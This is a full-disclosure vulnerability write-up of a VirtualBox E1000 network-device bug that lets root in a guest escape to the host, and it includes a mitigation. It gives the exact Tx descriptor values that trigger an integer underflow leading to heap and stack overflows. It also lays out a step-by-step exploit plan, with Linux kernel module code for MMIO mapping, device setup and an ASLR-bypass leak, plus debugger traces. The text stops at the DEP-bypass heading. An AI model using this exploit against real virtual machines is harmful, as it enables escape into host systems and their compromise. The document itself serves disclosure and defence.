Virtualbox e1000 0day

Why

I like VirtualBox and it has nothing to do with why I publish a 0day vulnerability. The reason is my disagreement with contemporary state of infosec, especially of security research and bug bounty:

  1. Wait half a year until a vulnerability is patched is considered fine.
  2. In the bug bounty field these are considered fine:
    1. Wait more than month until a submitted vulnerability is verified and a decision to buy or not to buy is made.
    2. Change the decision on the fly. Today you figured out the bug bounty program will buy bugs in a software, week later you come with bugs and exploits and receive «not interested».
    3. Have not a precise list of software a bug bounty is interested to buy bugs in. Handy for bug bounties, awkward for researchers.
    4. Have not precise lower and upper bounds of vulnerability prices. There are many things influencing a price but researchers need to know what is worth to work on and what is not.
  3. Delusion of grandeur and marketing bullshit: naming vulnerabilities and creating websites for them; making a thousand conferences in a year; exaggerating importance of own job as a security researcher; considering yourself «a world saviour». Come down, Your Highness.

I’m exhausted of the first two, therefore my move is full disclosure. Infosec, please move forward.

General Information

Vulnerable software: VirtualBox 5.2.20 and prior versions.

Host OS: any, the bug is in a shared code base.

Guest OS: any.

VM configuration: default (the only requirement is that a network card is Intel PRO/1000 MT Desktop (82540EM) and a mode is NAT).

How to protect yourself

Until the patched VirtualBox build is out you can change the network card of your virtual machines to PCnet (either of two) or to Paravirtualized Network. If you can’t, change the mode from NAT to another one. The former way is more secure.

Introduction

A default VirtualBox virtual network device is Intel PRO/1000 MT Desktop (82540EM) and the default network mode is NAT. We will refer to it E1000.

The E1000 has a vulnerability allowing an attacker with root/administrator privileges in a guest to escape to a host ring3. Then the attacker can use existing techniques to escalate privileges to ring 0 via /dev/vboxdrv.

Vulnerability Details

E1000 101

To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Packets are of data link layer frames and of other, more high level headers. Packets supplied to the adaptor are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores such metainformation as packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.

The 82540EM datasheet provides for three Tx descriptor types: legacy, context, data. Legacy is deprecated I believe. The other two are used together. The only thing we care of is that context descriptors set the maximum packet size and switch TCP/IP segmentation, and that data descriptors hold physical addresses of network packets and their sizes. The data descriptor’s packet size must be lesser than the context descriptor’s maximum packet size. Usually context descriptors are supplied to the network card before data descriptors.

To supply Tx descriptors to the network card a guess writes them to Tx Ring. This is a ring buffer residing in physical memory at a predefined address. When all descriptors are written down to Tx Ring the guest updates E1000 MMIO TDT register (Transmit Descriptor Tail) to tell the host there are new descriptors to handle.

Input

Consider the following array of Tx descriptors:

[context_1, data_2, data_3, context_4, data_5]

Let’s assign their structure fields as follows (field names are hypothetical to be human readable but directly map to the 82540EM specification):

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

We will learn why they should be like that in our step-by-step analysis.

Root Cause Analysis

[context_1, data_2, data_3] Processing

Let’s assume the descriptors above are written to the Tx Ring in the specified order and TDT register is updated by the guest. Now the host will execute e1kXmitPending function in src/VBox/Devices/Network/DevE1000.cpp file (most of comments are and will be stripped for the sake of readability):

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

e1kTxDLazyLoad will read all the 5 Tx descriptors from the Tx Ring. Then e1kLocateTxPacket is called for the first time. This function iterates through all the descriptors to set up an initial state but does not actually handle them. In our case the first call to e1kLocateTxPacket will handle context_1, data_2, and data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be handled at the second iteration of the while loop (we will cover the second iteration in the next section). This two-part array division is crucial to trigger the vulnerability so let’s figure out why.

e1kLocateTxPacket looks like this:

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is of E1K_DTYP_CONTEXT so e1kUpdateTxContext function is called. This function updates a TCP Segmentation Context if TCP Segmentation is enabled for the descriptor. It is true for context_1 so the TCP Segmentation Context will be updated. (What the TCP Segmentation Context Update actually is, is not important, and we will use this just to refer the code below).

The second descriptor (data_2) is of E1K_DTYP_DATA so several actions unnecessary for the discussion will be performed.

The third descriptor (data_3) is also of E1K_DTYP_DATA but since data_3.data_length == 0 no action is performed.

At the moment the three descriptors are initially processed and the two remain. Now the thing: after the switch statement there is a check wheter a descriptor’s end_of_packet field was set. It is true for data_3 descriptor (data_3.end_of_packet == true). The code does some actions and returns from the function:

        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

If data_3.end_of_packet would been false then the remaining context_4 and data_5 descriptors would be processed, and the vulnerability would been bypassed. Below you’ll see why that return from the function leads to the bug.

At the end of e1kLocateTxPacket function we have the following descriptors ready to unwrap network packets from and to send to a network: context_1, data_2, data_3. Then the inner loop of e1kXmitPending calls e1kXmitPacket. This functions iterates through all the descriptors (5 in our case) to actually process them:

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor e1kXmitDesc function is called:

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor passed to e1kXmitDesc is context_1. The function does nothing with context descriptors.

The second descriptor passed to e1kXmitDesc is data_2. Since all of our data descriptors have tcp_segmentation_enable == true (pDesc->data.cmd.fTSE above) we call e1kFallbackAddToFrame where there will be an integer underflow while data_5 is processed.

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

The most important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.

Let’s draw a table where values of these variables are specified before and after execution of e1kFallbackAddToFrame function for the two data descriptors.

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_2 Before 0x3010 0 0x10
After 0x3010 0x10 0
data_3 Before 0x3010 0x10 0
After 0x3010 0x10 0

You just need to note that when data_3 is processed pThis->u16TxPktLen equals to 0x10.

Next is the most important part. Please look again at the end of the snippet of e1kXmitPacket:

        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since data_3 type != E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break from the loop despite the fact that there are context_4 and data_5 to be processed. Why is it important? The key to understand the vulnerability is to understand that all context descriptors are processed before data descriptors. Context descriptors are processed during the TCP Segmentation Context Update in e1kLocateTxPacket. Data descriptors are processed later in the loop inside e1kXmitPacket function. The developer intention was to forbid changing u16MaxPktLen after some data was processed to prevent integer underflows in the code:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we are able to bypass this protection: recall that in e1kLocateTxPacket we forced the function to return because of data_3.end_of_packet == true. And because of that we have two descriptors (context_4 and data_5) left to be processed despite the fact that pThis->u16TxPktLen is 0x10, not 0. So there is a possibility to change u16MaxPktLen using context_4.maximum_segment_size to make the integer underflow.

[context_4, data_5] Processing

Now when the first three descriptors were processed we again arrive to the inner loop of e1kXmitPending:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here we call e1kLocateTxPacket do the initial processing of context_4 and data_5 descriptors. It has been said that we can set context_4.maximum_segment_size to a size lesser than the size of data already read i.e. lesser than 0x10. Recall our input Tx descriptors:

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

As a result of the call to e1kLocateTxPacket we have the maximum segment size equals to 0xF, whereas the size of data already read is 0x10.

Finally, when processing data_5 we again arrive to e1kFallbackAddToFrame and have the following variable values:

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_5 Before 0xF 0x10 0x4188
After

And therefore we have an integer underflow:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;

This makes the following check to be true since 0xFFFFFFFF > 0x4188:

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

e1kFallbackAddSegment function will be called with size 0x4188. Without the vulnerability it’s impossible to call e1kFallbackAddSegment with a size greater than 0x4000 because, during the TCP Segmentation Context Update in e1kUpdateTxContext, there is a check that the maximum segment size is less or equal to 0x4000:

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

Buffer Overflow

We have called e1kFallbackAddSegment with size 0x4188. How this can be abused? There are at least two possibilities I found. Firstly, data will be read from the guest into a heap buffer:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is the buffer of size 0x3FA0 and u16Len is 0x4188 — an obvious overflow that can lead, for example, to a function pointers overwrite.

Secondly, if we dig deeper we found that e1kFallbackAddSegment calls e1kTransmitFrame that can, with a certain configuration of E1000 registers, call e1kHandleRxPacket function. This function allocates a stack buffer of size 0x4000 and then copies data of a specified length (0x4188 in our case) to the buffer without any check:

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you see, we turned an integer underflow to a classical stack buffer overflow. The two overflows above — heap and stack ones — are used in the exploit.

Exploit

The exploit is Linux kernel module (LKM) to load in a guest OS. The Windows case would require a driver differing from the LKM just by an initialization wrapper and kernel API calls.

Elevated privileges are required to load a driver in both OSs. It’s common and isn’t considered an insurmountable obstacle. Look at Pwn2Own contest where researcher use exploit chains: a browser opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0 from where there are anything you need to attack a hypervisor from the guest OS. The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it’s mostly not audited yet.

The exploit is 100% reliable. It means it either works always or never because of mismatched binaries or other, more subtle reasons I didn’t account. It works at least on Ubuntu 16.04 and 18.04 x86_64 guests with default configuration.

Exploitation Algorithm

  1. An attacker unloads e1000.ko loaded by default in Linux guests and loads the exploit’s LKM.
  2. The LKM initializes E1000 according to the datasheet. Only the transmit half is initialized since there is no need for the receive half.
  3. Step 1: information leak.
    1. The LKM disables E1000 loopback mode to make stack buffer overflow code unreachable.
    2. The LKM uses the integer underflow vulnerability to make the heap buffer overflow.
    3. The heap buffer overflow allows for use E1000 EEPROM to write two any bytes relative to a heap buffer in 128 KB range. Hence the attacker gains a write primitive.
    4. The LKM uses the write primitive 8 times to write bytes to ACPI (Advanced Configuration and Power Interface) data structure on heap. Bytes are written to an index variable of a heap buffer from which a single byte will be read. Since the buffer size is lesser than maximum index number (255) the attacker can read past the buffer, hence he/she gains a read primitive.
    5. The LKM uses the read primitive 8 times to access ACPI and obtain 8 bytes from the heap. Those bytes are pointer of VBoxDD.so shared library.
    6. The LKM subtracts RVA from the pointer to obtain VBoxDD.so image base.
  4. Step 2: stack buffer overflow.
    1. The LKM enabled E1000 loopback mode to make stack buffer overflow code reachable.
    2. The LKM uses the integer underflow vulnerability to make the heap buffer overflow and the stack buffer overflow. Saved return address (RIP/EIP) is overwritten. The attacker gains control.
    3. ROP chain is executed to execute a shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies a shellcode from the stack next to itself. The shellcode is executed.
    2. The shellcode does fork and execve syscalls to spawn an arbitrary process on the host side.
    3. The parent process does process continuation.
  6. The attacker unloads the LKM and loads e1000.ko back to allow the guest to use network.

Initialization

The LKM maps physical memory regarding to E1000 MMIO. Physical address and size are predefined by the hypervisor.

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

Then E1000 general purpose registers are configured, Tx Ring memory is allocated, transmit registers are configured.

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

ASLR Bypass

Write primitive

From the beginning of exploit development I decided not to use primitives found in services disabled by default. This means in the first place the Chromium service (not a browser) that provides for 3D acceleration where more than 40 vulnerabilities are found by researchers in the last year.

The problem was to find an information leak in default VirtualBox subsystems. The obvious thought was that if the integer underflow allows to overflow the heap buffer then we control anything past the buffer. We’ll see that not a single additional vulnerability was required: the integer underflow appeared to be quite powerful to derive read, write, and information leak primitives from it, not saying of the stack buffer overflow.

Let’s examine what exactly is overflowed on the heap.

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is a buffer of size 0x3FA0 which will be overflowed with bytes copied from a data descriptor. Searching for interesting fields after the buffer I came to E1kEEPROM structure which contains another structure with the following fields (src/VBox/Devices/Network/DevE1000.cpp):

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

How can we abuse them? E1000 implements EEPROM, secondary adaptor memory. The guest OS can access it via E1000 MMIO registers. EEPROM is implemented as a finite automaton with several states and does four actions. We are interested only in «write to memory». This is how it looks (src/VBox/Devices/Network/DevEEPROM.cpp):

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of EEPROM93C46 structure we control. We can malform them in a way that

m_au16Data[u32Addr] = u16Value;

statement will write two bytes at arbitrary 16-bit offset from m_au16Data that also residing in the structure. We have found a write primitive.

Read primitive

The next problem was to find data structures on the heap to write arbitrary data into, pursuing the main goal to leak a shared library pointer to get its image base. Hopefully, it was need not to do an unstable heap spray because virtual devices’ main data structures appeared to be allocated from an internal hypervisor heap in the way that the distance between them is always constant, despite that their virtual addresses, of course, are randomized by ASLR.

When a virtual machine is launched the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I traced that code under GDB using a script and got these results:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

Note the E1000 device at #0xE position. It can be seen in the second list that the following device is at 0x5700 offset from E1000, the next is at 0x19E0 and so on. We already said that these distances are always the same, and it’s our exploitation opportunity.

Devices following E1000 are ICH IC’97, OHCI, ACPI, VirtualBox GIM. Learning their data structures I figured the way to use the write primitive.

On virtual machine boot up the ACPI device is created (src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

An ACPI port input/output handler is registered for 0x4100-0x410F range. In the case of 0x4107 port we have:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes INB(0x4107) instruction to read one byte from the port, the handler takes one bytes from au8SMBusBlkDat[32] array at u8SMBusBlkIdx index and returns it to the guest. And this is how to apply the write primitive: since the distance between virtual device heap blocks are constant, so is the distance from EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx. Writing two bytes to ACPIState.u8SMBusBlkIdx we can read arbitrary data in the range of 255 bytes from ACPIState.au8SMBusBlkDat.

There is an obstacle. Having a look to ACPIState structure it can be seen that the array is placed at the end of the structure. The remaining fields are useless to leak. So let’s look what can be found after the structure:

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

It seems there is a pointer to a string placed at a fixed offset from VBoxDD.so image base. The pointer lies at 0x58 offset at the end of ACPIState. We can read that pointer byte-by-byte using the primitives and finally obtain VBoxDD.so image base. We just hope that data past ACPIState structure is not random on each virtual machine boot. Hopefully, it isn’t; the pointer at 0x58 offset is always there.

Information Leak

Now we combine write and read primitives and exploit them to bypass ASLR. We will overflow the heap overwriting EEPROM93C46 structure, then trigger EEPROM finite automaton to write the index to ACPIState structure, and then execute INB(0x4107) in the guest to access ACPI to read one byte of the pointer. Repeat those 8 times incrementing the index by 1.

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

It has been said that in order for the integer underflow not to lead to the stack buffer overflow, certain E1000 registers should been configured. The idea is that the buffer is being overflowed in e1kHandleRxPacket function which is called while handling Tx descriptors in the loopback mode. Indeed, in the loopback mode the guest sends network packets to itself so they are received right after being sent. We disable this mode so e1kHandleRxPacket is unreachable.

DEP Bypass

We have bypassed ASLR. Now the loopback mode can be enabled and the stack buffer overflow can be triggered.

